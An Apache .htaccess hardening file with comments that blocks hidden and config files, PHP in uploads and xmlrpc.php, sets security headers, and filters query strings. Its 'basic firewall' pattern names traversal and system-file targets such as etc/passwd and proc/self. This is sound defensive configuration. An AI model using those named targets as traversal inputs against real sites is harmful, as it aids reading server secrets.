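# ----------------------------------------
# 🔒 SECURITY: Protect Website from Hackers
# ----------------------------------------
# Scope: these are per-directory directives for Apache httpd. They take effect
# only when Apache itself serves this tree and AllowOverride permits them.
# nginx and other servers never read .htaccess, so a site served directly by
# nginx needs equivalent rules in its own server configuration.
#
# Access rules use "Require all denied" on Apache 2.4 (mod_authz_core) and fall
# back to the 2.2 "Order/Deny" pair. On 2.4 the old pair needs
# mod_access_compat; without it the whole file fails with a 500.
#
# The Header and Rewrite* directives need mod_headers and mod_rewrite. They are
# deliberately not wrapped in <IfModule>, so a missing module fails loudly
# instead of silently dropping the protection.

# Disable directory browsing
Options -Indexes

# Prevent viewing of .htaccess itself
<Files ".htaccess">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</Files>

# Protect configuration and system files
# NOTE: this denies every *.json, *.yml and *.log file by extension, including
# ones the front end may legitimately fetch (e.g. a web app manifest). Review
# the list against what the site actually serves.
<FilesMatch "(^#.*#|\.(bak|config|sql|fla|psd|ini|log|sh|inc|swp|dist|env|json|lock|gitignore|git|yml|yaml))$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# Block access to hidden files and directories (e.g., .git, .env)
# /.well-known/ is exempted because it is meant to be public (ACME HTTP-01
# certificate validation, security.txt). Blocking it breaks certificate
# issuance and renewal.
RedirectMatch 403 "/\.(?!well-known/)"

# Prevent PHP execution in uploads folder (change 'uploads' to your folder)
# <Directory> is not allowed inside .htaccess and makes Apache reject the whole
# file, so the restriction is expressed as a rewrite rule. The pattern is
# relative to the directory that holds this .htaccess.
# This only refuses requests by extension. The stronger control is to disable
# the PHP handler for the uploads directory in the server or vhost config, or
# to store uploads outside the document root.
RewriteEngine On
RewriteRule ^uploads/.+\.(?:php\d?|phtml|phar)$ - [F,NC]

# Protect wp-config.php or other critical config files (for WordPress or PHP apps)
<Files "wp-config.php">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</Files>

# Block access to composer files
# Anchored so that only these exact file names match.
<FilesMatch "^(composer\.json|composer\.lock|package\.json|yarn\.lock)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# Disable server signature
# This only removes the footer on server-generated pages (error pages, listings).
# The version in the "Server:" response header is controlled by ServerTokens,
# which can only be set in the main server configuration, not in .htaccess.
ServerSignature Off

# Prevent content-type sniffing
Header always set X-Content-Type-Options "nosniff"

# Legacy XSS filter header
# Current browsers have removed the XSS auditor, and its filtering mode caused
# problems in older ones. Current guidance is to switch it off explicitly and
# rely on output encoding plus a Content-Security-Policy written for this site.
Header always set X-XSS-Protection "0"

# Prevent Clickjacking
# A CSP "frame-ancestors" directive is the modern equivalent. Keep this header
# for older browsers.
Header always set X-Frame-Options "SAMEORIGIN"

# Enforce HTTPS (optional — uncomment if you have SSL)
# RewriteEngine On
# RewriteCond %{HTTPS} off
# RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# Block suspicious query strings (basic firewall)
# Defence in depth only: the query string is matched in its raw, still-encoded
# form and POST bodies are not inspected, so this does not replace input
# validation in the application. The "https?://" alternative also rejects
# legitimate requests that carry a URL parameter (login redirects, OAuth
# callbacks). Test it against the site's real traffic.
RewriteCond %{QUERY_STRING} (\.\./|\.\.\\|boot\.ini|etc/passwd|self/environ) [NC,OR]
RewriteCond %{QUERY_STRING} (GLOBALS|_REQUEST|proc/self|ftp://|https?://|mosConfig) [NC]
RewriteRule ^(.*)$ - [F,L]

# Block access to xmlrpc.php (WordPress users)
<Files "xmlrpc.php">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</Files>

# Disable image hotlinking (optional)
# RewriteCond %{HTTP_REFERER} !^$
# RewriteCond %{HTTP_REFERER} !^https?://(www\.)?yourdomain\.com [NC]
# RewriteRule \.(jpg|jpeg|png|gif)$ - [F]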